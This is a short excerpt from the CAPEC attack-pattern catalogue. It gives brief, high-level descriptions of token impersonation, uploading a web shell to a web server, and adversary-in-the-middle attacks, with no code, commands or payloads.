CAPEC-633: Token Impersonation

An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.

CAPEC-650: Upload a Web Shell to a Web Server

By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.

CAPEC-94: Adversary in the Middle (AiTM)

An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.